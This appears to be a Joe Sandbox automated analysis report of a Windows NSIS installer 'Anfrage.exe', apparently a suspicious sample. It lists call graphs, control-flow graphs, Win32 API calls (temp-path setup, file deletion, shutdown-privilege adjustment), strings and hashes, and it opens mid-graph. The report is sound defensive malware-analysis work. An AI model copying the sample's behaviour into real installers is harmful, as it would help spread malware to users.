3897->3872 3900 40140b 2 API calls 3898->3900 3899->3898 3900->3872 3901->3872 3903 40615c 5 API calls 3902->3903 3904 4034cc lstrcatA 3903->3904 3904->3768 3904->3769 3905->3786 3907 405c9f 3906->3907 3908 405c92 3906->3908 3907->3786 4049 405b0c lstrcpyA 3908->4049 3911 405593 3910->3911 3912 405587 CloseHandle 3910->3912 3911->3786 3912->3911 3913->3728 4083 405dc3 lstrcpynA 3914->4083 3916 405934 4084 4058ce CharNextA CharNextA 3916->4084 3919 40346d 3919->3793 3928 405dc3 lstrcpynA 3919->3928 3920 40602e 5 API calls 3926 40594a 3920->3926 3921 405975 lstrlenA 3922 405980 3921->3922 3921->3926 3924 405835 3 API calls 3922->3924 3925 405985 GetFileAttributesA 3924->3925 3925->3919 3926->3919 3926->3921 3927 40587c 2 API calls 3926->3927 4090 4060c7 FindFirstFileA 3926->4090 3927->3921 3928->3776 3929->3742 3931 403681 3930->3931 3932 403673 CloseHandle 3930->3932 4093 4036ae 3931->4093 3932->3931 3938 4055ce 3937->3938 3939 4034bf ExitProcess 3938->3939 3940 4055e2 MessageBoxIndirectA 3938->3940 3940->3939 3942 4054f3 GetLastError 3941->3942 3943 40350e 3941->3943 3942->3943 3944 405502 SetFileSecurityA 3942->3944 3943->3781 3944->3943 3945 405518 GetLastError 3944->3945 3945->3943 3947 405533 GetLastError 3946->3947 3948 40552f 3946->3948 3947->3948 3948->3781 3949->3783 3951 401389 2 API calls 3950->3951 3952 401420 3951->3952 3952->3753 3954 403190 3953->3954 3955 40584f lstrcatA 3953->3955 3954->3814 3955->3954 3957 405a70 GetTickCount GetTempFileNameA 3956->3957 3958 4031a1 3957->3958 3959 405a9d 3957->3959 3958->3730 3959->3957 3959->3958 3960->3820 3961->3822 3963 405889 3962->3963 3964 402d66 3963->3964 3965 40588e CharPrevA 3963->3965 3966 405dc3 lstrcpynA 3964->3966 3965->3963 3965->3964 3966->3826 3968 402cb7 3967->3968 3969 402c9f 3967->3969 3972 402cc7 GetTickCount 3968->3972 3973 402cbf 3968->3973 3970 402ca8 DestroyWindow 3969->3970 3971 402caf 3969->3971 3970->3971 3971->3829 3975 402cd5 CreateDialogParamA ShowWindow 3972->3975 3976 402cf8 
3972->3976 4003 406198 3973->4003 3975->3976 3976->3829 3978->3835 3980 402f49 3979->3980 3981 402f77 3980->3981 4009 40315b SetFilePointer 3980->4009 3983 403145 ReadFile 3981->3983 3984 402f82 3983->3984 3985 402f94 GetTickCount 3984->3985 3986 4030de 3984->3986 3993 4030c8 3984->3993 3985->3993 3997 402fe3 3985->3997 3987 403120 3986->3987 3992 4030e2 3986->3992 3989 403145 ReadFile 3987->3989 3988 403145 ReadFile 3988->3997 3989->3993 3990 403145 ReadFile 3990->3992 3991 405add WriteFile 3991->3992 3992->3990 3992->3991 3992->3993 3993->3844 3994 403039 GetTickCount 3994->3997 3995 40305e MulDiv wsprintfA 4010 404fdc 3995->4010 3997->3988 3997->3993 3997->3994 3997->3995 4007 405add WriteFile 3997->4007 4021 405aae ReadFile 3999->4021 4002->3837 4004 4061b5 PeekMessageA 4003->4004 4005 402cc5 4004->4005 4006 4061ab DispatchMessageA 4004->4006 4005->3829 4006->4004 4008 405afb 4007->4008 4008->3997 4009->3981 4011 404ff7 4010->4011 4020 40509a 4010->4020 4012 405014 lstrlenA 4011->4012 4013 405de5 18 API calls 4011->4013 4014 405022 lstrlenA 4012->4014 4015 40503d 4012->4015 4013->4012 4016 405034 lstrcatA 4014->4016 4014->4020 4017 405050 4015->4017 4018 405043 SetWindowTextA 4015->4018 4016->4015 4019 405056 SendMessageA SendMessageA SendMessageA 4017->4019 4017->4020 4018->4017 4019->4020 4020->3997 4022 403158 4021->4022 4022->3841 4024 403a1c 4023->4024 4041 405d21 wsprintfA 4024->4041 4026 403a8d 4027 405de5 18 API calls 4026->4027 4028 403a99 SetWindowTextA 4027->4028 4029 4037c8 4028->4029 4030 403ab5 4028->4030 4029->3859 4030->4029 4031 405de5 18 API calls 4030->4031 4031->4030 4032->3855 4033->3861 4042 403ff4 4034->4042 4036 403ff4 SendMessageA 4037 40510a OleUninitialize 4036->4037 4037->3891 4038 4050f8 4038->4036 4040 4050d1 4040->4038 4045 401389 4040->4045 4041->4026 4043 40400c 4042->4043 4044 403ffd SendMessageA 4042->4044 4043->4040 4044->4043 4047 401390 4045->4047 4046 4013fe 4046->4040 4047->4046 4048 4013cb MulDiv SendMessageA 4047->4048 
4048->4047 4050 405b34 4049->4050 4051 405b5a GetShortPathNameA 4049->4051 4076 405a36 GetFileAttributesA CreateFileA 4050->4076 4053 405c79 4051->4053 4054 405b6f 4051->4054 4053->3907 4054->4053 4056 405b77 wsprintfA 4054->4056 4055 405b3e CloseHandle GetShortPathNameA 4055->4053 4058 405b52 4055->4058 4057 405de5 18 API calls 4056->4057 4059 405b9f 4057->4059 4058->4051 4058->4053 4077 405a36 GetFileAttributesA CreateFileA 4059->4077 4061 405bac 4061->4053 4062 405bbb GetFileSize GlobalAlloc 4061->4062 4063 405c72 CloseHandle 4062->4063 4064 405bdd 4062->4064 4063->4053 4065 405aae ReadFile 4064->4065 4066 405be5 4065->4066 4066->4063 4078 40599b lstrlenA 4066->4078 4069 405c10 4071 40599b 4 API calls 4069->4071 4070 405bfc lstrcpyA 4072 405c1e 4070->4072 4071->4072 4073 405c55 SetFilePointer 4072->4073 4074 405add WriteFile 4073->4074 4075 405c6b GlobalFree 4074->4075 4075->4063 4076->4055 4077->4061 4079 4059dc lstrlenA 4078->4079 4080 4059e4 4079->4080 4081 4059b5 lstrcmpiA 4079->4081 4080->4069 4080->4070 4081->4080 4082 4059d3 CharNextA 4081->4082 4082->4079 4083->3916 4085 4058e9 4084->4085 4087 4058f9 4084->4087 4085->4087 4088 4058f4 CharNextA 4085->4088 4086 405919 4086->3919 4086->3920 4087->4086 4089 405860 CharNextA 4087->4089 4088->4086 4089->4087 4091 4060e8 4090->4091 4092 4060dd FindClose 4090->4092 4091->3926 4092->4091 4094 4036bc 4093->4094 4095 403686 4094->4095 4096 4036c1 FreeLibrary GlobalFree 4094->4096 4097 405665 4095->4097 4096->4095 4096->4096 4098 405923 18 API calls 4097->4098 4099 405685 4098->4099 4100 4056a4 4099->4100 4101 40568d DeleteFileA 4099->4101 4103 4057dc 4100->4103 4138 405dc3 lstrcpynA 4100->4138 4102 4034a0 OleUninitialize 4101->4102 4102->3750 4102->3751 4103->4102 4108 4060c7 2 API calls 4103->4108 4105 4056ca 4106 4056d0 lstrcatA 4105->4106 4107 4056dd 4105->4107 4109 4056e3 4106->4109 4110 40587c 2 API calls 4107->4110 4113 4057f6 4108->4113 4111 4056f1 lstrcatA 4109->4111 4112 4056e8 4109->4112 4110->4109 4114 
4056fc lstrlenA FindFirstFileA 4111->4114 4112->4111 4112->4114 4113->4102 4115 4057fa 4113->4115 4116 4057d2 4114->4116 4120 405720 4114->4120 4117 405835 3 API calls 4115->4117 4116->4103 4119 405800 4117->4119 4118 405860 CharNextA 4118->4120 4121 40561d 5 API calls 4119->4121 4120->4118 4126 4057b1 FindNextFileA 4120->4126 4133 405665 62 API calls 4120->4133 4135 404fdc 25 API calls 4120->4135 4136 404fdc 25 API calls 4120->4136 4137 405c7e 38 API calls 4120->4137 4139 405dc3 lstrcpynA 4120->4139 4140 40561d 4120->4140 4122 40580c 4121->4122 4123 405810 4122->4123 4124 405826 4122->4124 4123->4102 4128 404fdc 25 API calls 4123->4128 4125 404fdc 25 API calls 4124->4125 4125->4102 4126->4120 4129 4057c9 FindClose 4126->4129 4130 40581d 4128->4130 4129->4116 4131 405c7e 38 API calls 4130->4131 4134 405824 4131->4134 4133->4120 4134->4102 4135->4126 4136->4120 4137->4120 4138->4105 4139->4120 4148 405a11 GetFileAttributesA 4140->4148 4143 40564a 4143->4120 4144 405640 DeleteFileA 4146 405646 4144->4146 4145 405638 RemoveDirectoryA 4145->4146 4146->4143 4147 405656 SetFileAttributesA 4146->4147 4147->4143 4149 405629 4148->4149 4150 405a23 SetFileAttributesA 4148->4150 4149->4143 4149->4144 4149->4145 4150->4149 4151 401e25 4159 402aac 4151->4159 4153 401e2b 4154 402aac 18 API calls 4153->4154 4155 401e37 4154->4155 4156 401e43 ShowWindow 4155->4156 4157 401e4e EnableWindow 4155->4157 4158 40295e 4156->4158 4157->4158 4160 405de5 18 API calls 4159->4160 4161 402ac1 4160->4161 4161->4153 5262 401f2d 5263 402ace 18 API calls 5262->5263 5264 401f34 5263->5264 5265 4060c7 2 API calls 5264->5265 5266 401f3a 5265->5266 5267 401f4c 5266->5267 5269 405d21 wsprintfA 5266->5269 5269->5267 5270 402336 5271 402ace 18 API calls 5270->5271 5272 402347 5271->5272 5273 402ace 18 API calls 5272->5273 5274 402350 5273->5274 5275 402ace 18 API calls 5274->5275 5276 40235a GetPrivateProfileStringA 5275->5276 5277 4014b7 5278 4014bd 5277->5278 5279 401389 2 API calls 5278->5279 5280 
4014c5 5279->5280 5281 404737 5282 404763 5281->5282 5283 404747 5281->5283 5285 404796 5282->5285 5286 404769 SHGetPathFromIDListA 5282->5286 5292 40559d GetDlgItemTextA 5283->5292 5287 404779 5286->5287 5291 404780 SendMessageA 5286->5291 5289 40140b 2 API calls 5287->5289 5288 404754 SendMessageA 5288->5282 5289->5291 5291->5285 5292->5288 5293 401b39 5294 402ace 18 API calls 5293->5294 5295 401b40 5294->5295 5296 402aac 18 API calls 5295->5296 5297 401b49 wsprintfA 5296->5297 5298 40295e 5297->5298 5299 402939 SendMessageA 5300 402953 InvalidateRect 5299->5300 5301 40295e 5299->5301 5300->5301 4518 4015bb 4519 402ace 18 API calls 4518->4519 4520 4015c2 4519->4520 4521 4058ce 4 API calls 4520->4521 4533 4015ca 4521->4533 4522 401624 4524 401652 4522->4524 4525 401629 4522->4525 4523 405860 CharNextA 4523->4533 4527 401423 25 API calls 4524->4527 4526 401423 25 API calls 4525->4526 4528 401630 4526->4528 4535 40164a 4527->4535 4537 405dc3 lstrcpynA 4528->4537 4530 40551f 2 API calls 4530->4533 4531 40553c 5 API calls 4531->4533 4532 40163b SetCurrentDirectoryA 4532->4535 4533->4522 4533->4523 4533->4530 4533->4531 4534 40160c GetFileAttributesA 4533->4534 4536 4054a2 4 API calls 4533->4536 4534->4533 4536->4533 4537->4532 5302 4016bb 5303 402ace 18 API calls 5302->5303 5304 4016c1 GetFullPathNameA 5303->5304 5305 4016d8 5304->5305 5311 4016f9 5304->5311 5307 4060c7 2 API calls 5305->5307 5305->5311 5306 40170d GetShortPathNameA 5308 40295e 5306->5308 5309 4016e9 5307->5309 5309->5311 5312 405dc3 lstrcpynA 5309->5312 5311->5306 5311->5308 5312->5311 5313 401d3b GetDlgItem GetClientRect 5314 402ace 18 API calls 5313->5314 5315 401d6b LoadImageA SendMessageA 5314->5315 5316 401d89 DeleteObject 5315->5316 5317 40295e 5315->5317 5316->5317 5318 4040bc lstrcpynA lstrlenA

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE ref: 004031C8
                                                                          • GetVersion.KERNEL32 ref: 004031CE
                                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004031F7
                                                                          • #17.COMCTL32(00000007,00000009), ref: 00403219
                                                                          • OleInitialize.OLE32(00000000), ref: 00403220
                                                                          • SHGetFileInfoA.SHELL32(00429828,00000000,?,00000160,00000000), ref: 0040323C
                                                                          • GetCommandLineA.KERNEL32(Hves Setup,NSIS Error), ref: 00403251
                                                                          • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Anfrage.exe",00000000), ref: 00403264
                                                                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Anfrage.exe",00000020), ref: 0040328F
                                                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040338C
                                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040339D
                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033A9
                                                                          • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033BD
                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033C5
                                                                          • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004033D6
                                                                          • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004033DE
                                                                          • DeleteFileA.KERNELBASE(1033), ref: 004033F2
                                                                            • Part of subcall function 0040615C: GetModuleHandleA.KERNEL32(?,?,?,0040320D,00000009), ref: 0040616E
                                                                            • Part of subcall function 0040615C: GetProcAddress.KERNEL32(00000000,?), ref: 00406189
                                                                          • OleUninitialize.OLE32(?), ref: 004034A0
                                                                          • ExitProcess.KERNEL32 ref: 004034C1
                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 004035DE
                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004035E5
                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004035FD
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 0040361C
                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403640
                                                                          • ExitProcess.KERNEL32 ref: 00403663
                                                                            • Part of subcall function 004055B9: MessageBoxIndirectA.USER32(0040A218), ref: 00405614
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                                          • String ID: "$"C:\Users\user\Desktop\Anfrage.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\secretaryships$C:\Users\user\AppData\Roaming\secretaryships\Descendentalistic$C:\Users\user\Desktop$C:\Users\user\Desktop\Anfrage.exe$Error launching installer$Hves Setup$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`KXu$~nsu
                                                                          • API String ID: 3329125770-2066266180
                                                                          • Opcode ID: c1f9194aaabd033ec7754895e46d654ced239fcc03380315cc0212c25b4d743a
                                                                          • Instruction ID: 865bae31cffe44a71533f85cac42dc3cbe617e6c2420eff4fa764eab91bf8bd9
                                                                          • Opcode Fuzzy Hash: c1f9194aaabd033ec7754895e46d654ced239fcc03380315cc0212c25b4d743a
                                                                          • Instruction Fuzzy Hash: 78C10530104741AAD721BF759D59A2F3EA9EF4530AF44443FF581B61E2CB7C8A058B6E

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 128 404959-4049a5 GetDlgItem * 2 129 404bc5-404bcc 128->129 130 4049ab-404a3f GlobalAlloc LoadBitmapA SetWindowLongA ImageList_Create ImageList_AddMasked SendMessageA * 2 128->130 131 404be0 129->131 132 404bce-404bde 129->132 133 404a41-404a4c SendMessageA 130->133 134 404a4e-404a55 DeleteObject 130->134 135 404be3-404bec 131->135 132->135 133->134 136 404a57-404a5f 134->136 137 404bf7-404bfd 135->137 138 404bee-404bf1 135->138 139 404a61-404a64 136->139 140 404a88-404a8c 136->140 144 404c0c-404c13 137->144 145 404bff-404c06 137->145 138->137 141 404cdb-404ce2 138->141 142 404a66 139->142 143 404a69-404a86 call 405de5 SendMessageA * 2 139->143 140->136 146 404a8e-404aba call 403fa8 * 2 140->146 151 404d53-404d5b 141->151 152 404ce4-404cea 141->152 142->143 143->140 148 404c15-404c18 144->148 149 404c88-404c8b 144->149 145->141 145->144 184 404ac0-404ac6 146->184 185 404b84-404b97 GetWindowLongA SetWindowLongA 146->185 157 404c23-404c38 call 4048a7 148->157 158 404c1a-404c21 148->158 149->141 153 404c8d-404c97 149->153 155 404d65-404d6c 151->155 156 404d5d-404d63 SendMessageA 151->156 160 404cf0-404cfa 152->160 161 404f3b-404f4d call 40400f 152->161 163 404ca7-404cb1 153->163 164 404c99-404ca5 SendMessageA 153->164 165 404da0-404da7 155->165 166 404d6e-404d75 155->166 156->155 157->149 183 404c3a-404c4b 157->183 158->149 158->157 160->161 169 404d00-404d0f SendMessageA 160->169 163->141 171 404cb3-404cbd 163->171 164->163 176 404efd-404f04 165->176 177 404dad-404db9 call 4011ef 165->177 172 404d77-404d78 ImageList_Destroy 166->172 173 404d7e-404d85 166->173 169->161 178 404d15-404d26 SendMessageA 169->178 179 404cce-404cd8 171->179 180 404cbf-404ccc 171->180 172->173 181 404d87-404d88 GlobalFree 173->181 182 404d8e-404d9a 173->182 176->161 189 404f06-404f0d 176->189 203 404dc9-404dcc 177->203 204 404dbb-404dbe 177->204 187 404d30-404d32 178->187 188 404d28-404d2e 178->188 179->141 180->141 181->182 182->165 183->149 192 404c4d-404c4f 183->192 193 404ac9-404acf 184->193 191 404b9d-404ba1 185->191 195 404d33-404d4c call 401299 SendMessageA 187->195 188->187 188->195 189->161 190 404f0f-404f39 ShowWindow GetDlgItem ShowWindow 189->190 190->161 197 404ba3-404bb6 ShowWindow call 403fdd 191->197 198 404bbb-404bc3 call 403fdd 191->198 199 404c51-404c58 192->199 200 404c62 192->200 201 404b65-404b78 193->201 202 404ad5-404afd 193->202 195->151 197->161 198->129 211 404c5a-404c5c 199->211 212 404c5e-404c60 199->212 215 404c65-404c81 call 40117d 200->215 201->193 206 404b7e-404b82 201->206 213 404b37-404b39 202->213 214 404aff-404b35 SendMessageA 202->214 207 404e0d-404e31 call 4011ef 203->207 208 404dce-404de7 call 4012e2 call 401299 203->208 216 404dc0 204->216 217 404dc1-404dc4 call 404927 204->217 206->185 206->191 230 404ed3-404ee7 InvalidateRect 207->230 231 404e37 207->231 238 404df7-404e06 SendMessageA 208->238 239 404de9-404def 208->239 211->215 212->215 218 404b3b-404b4a SendMessageA 213->218 219 404b4c-404b62 SendMessageA 213->219 214->201 215->149 216->217 217->203 218->201 219->201 230->176 234 404ee9-404ef8 call 40487a call 404862 230->234 232 404e3a-404e45 231->232 235 404e47-404e56 232->235 236 404ebb-404ecd 232->236 234->176 240 404e58-404e65 235->240 241 404e69-404e6c 235->241 236->230 236->232 238->207 242 404df1 239->242 243 404df2-404df5 239->243 240->241 245 404e73-404e7c 241->245 246 404e6e-404e71 241->246 242->243 243->238 243->239 248 404e81-404eb9 SendMessageA * 2 245->248 249 404e7e 245->249 246->248 248->236 249->248
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404971
                                                                          • GetDlgItem.USER32(?,00000408), ref: 0040497C
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 004049C6
                                                                          • LoadBitmapA.USER32(0000006E), ref: 004049D9
                                                                          • SetWindowLongA.USER32(?,000000FC,00404F50), ref: 004049F2
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A06
                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A18
                                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 00404A2E
                                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A3A
                                                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A4C
                                                                          • DeleteObject.GDI32(00000000), ref: 00404A4F
                                                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A7A
                                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A86
                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B1B
                                                                          • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404B46
                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B5A
                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00404B89
                                                                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B97
                                                                          • ShowWindow.USER32(?,00000005), ref: 00404BA8
                                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404CA5
                                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404D0A
                                                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D1F
                                                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D43
                                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D63
                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404D78
                                                                          • GlobalFree.KERNEL32(?), ref: 00404D88
                                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404E01
                                                                          • SendMessageA.USER32(?,00001102,?,?), ref: 00404EAA
                                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404EB9
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404ED9
                                                                          • ShowWindow.USER32(?,00000000), ref: 00404F27
                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00404F32
                                                                          • ShowWindow.USER32(00000000), ref: 00404F39
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                          • String ID: $M$N
                                                                          • API String ID: 1638840714-813528018
                                                                          • Opcode ID: 4315433588f7ee8e45bd5ba278d1dd566df0f8305feb02016673aa1b72d95d64
                                                                          • Instruction ID: 74b4d15ca57fbdec2c0db9e6478e75b59205225842bd8ef9acc4dc7b15762c80
                                                                          • Opcode Fuzzy Hash: 4315433588f7ee8e45bd5ba278d1dd566df0f8305feb02016673aa1b72d95d64
                                                                          • Instruction Fuzzy Hash: A30292B0A00209AFEF209F65DD45AAE7BB5FB84315F10853AF610B62E1C7789D52CF58

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 494 405de5-405df0 495 405df2-405e01 494->495 496 405e03-405e18 494->496 495->496 497 40600b-40600f 496->497 498 405e1e-405e29 496->498 499 406015-40601f 497->499 500 405e3b-405e45 497->500 498->497 501 405e2f-405e36 498->501 502 406021-406025 call 405dc3 499->502 503 40602a-40602b 499->503 500->499 504 405e4b-405e52 500->504 501->497 502->503 506 405e58-405e8d 504->506 507 405ffe 504->507 508 405e93-405e9e GetVersion 506->508 509 405fa8-405fab 506->509 510 406000-406006 507->510 511 406008-40600a 507->511 512 405ea0-405ea4 508->512 513 405eb8 508->513 514 405fdb-405fde 509->514 515 405fad-405fb0 509->515 510->497 511->497 512->513 516 405ea6-405eaa 512->516 519 405ebf-405ec6 513->519 520 405fe0-405fe7 call 405de5 514->520 521 405fec-405ffc lstrlenA 514->521 517 405fc0-405fcc call 405dc3 515->517 518 405fb2-405fbe call 405d21 515->518 516->513 522 405eac-405eb0 516->522 532 405fd1-405fd7 517->532 518->532 524 405ec8-405eca 519->524 525 405ecb-405ecd 519->525 520->521 521->497 522->513 528 405eb2-405eb6 522->528 524->525 530 405f06-405f09 525->530 531 405ecf-405eea call 405caa 525->531 528->519 533 405f19-405f1c 530->533 534 405f0b-405f17 GetSystemDirectoryA 530->534 540 405eef-405ef2 531->540 532->521 536 405fd9 532->536 538 405f86-405f88 533->538 539 405f1e-405f2c GetWindowsDirectoryA 533->539 537 405f8a-405f8d 534->537 541 405fa0-405fa6 call 40602e 536->541 537->541 545 405f8f-405f93 537->545 538->537 543 405f2e-405f38 538->543 539->538 544 405ef8-405f01 call 405de5 540->544 540->545 541->521 547 405f52-405f68 SHGetSpecialFolderLocation 543->547 548 405f3a-405f3d 543->548 544->537 545->541 550 405f95-405f9b lstrcatA 545->550 552 405f83 547->552 553 405f6a-405f81 SHGetPathFromIDListA CoTaskMemFree 547->553 548->547 551 405f3f-405f46 548->551 550->541 555 405f4e-405f50 551->555 552->538 553->537 553->552 555->537 555->547
                                                                          APIs
                                                                          • GetVersion.KERNEL32(?,0042A048,00000000,00405014,0042A048,00000000), ref: 00405E96
                                                                          • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405F11
                                                                          • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405F24
                                                                          • SHGetSpecialFolderLocation.SHELL32(?,0041C020), ref: 00405F60
                                                                          • SHGetPathFromIDListA.SHELL32(0041C020,Call), ref: 00405F6E
                                                                          • CoTaskMemFree.OLE32(0041C020), ref: 00405F79
                                                                          • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F9B
                                                                          • lstrlenA.KERNEL32(Call,?,0042A048,00000000,00405014,0042A048,00000000), ref: 00405FED
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                          • API String ID: 900638850-1230650788
                                                                          • Opcode ID: fcec94f82e88fcce29c7e60c56cd8c103032a989a52b9d99fcd4bfd562cc5ef6
                                                                          • Instruction ID: dce6f903095129fb599a93a9a66318a4e9c512c80ea25934a290623bed19ebbf
                                                                          • Opcode Fuzzy Hash: fcec94f82e88fcce29c7e60c56cd8c103032a989a52b9d99fcd4bfd562cc5ef6
                                                                          • Instruction Fuzzy Hash: 2F611271A04A02AEEB209B24DD84BBF7BA8DB15314F50813FE942B62D1D37D49429F5E

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
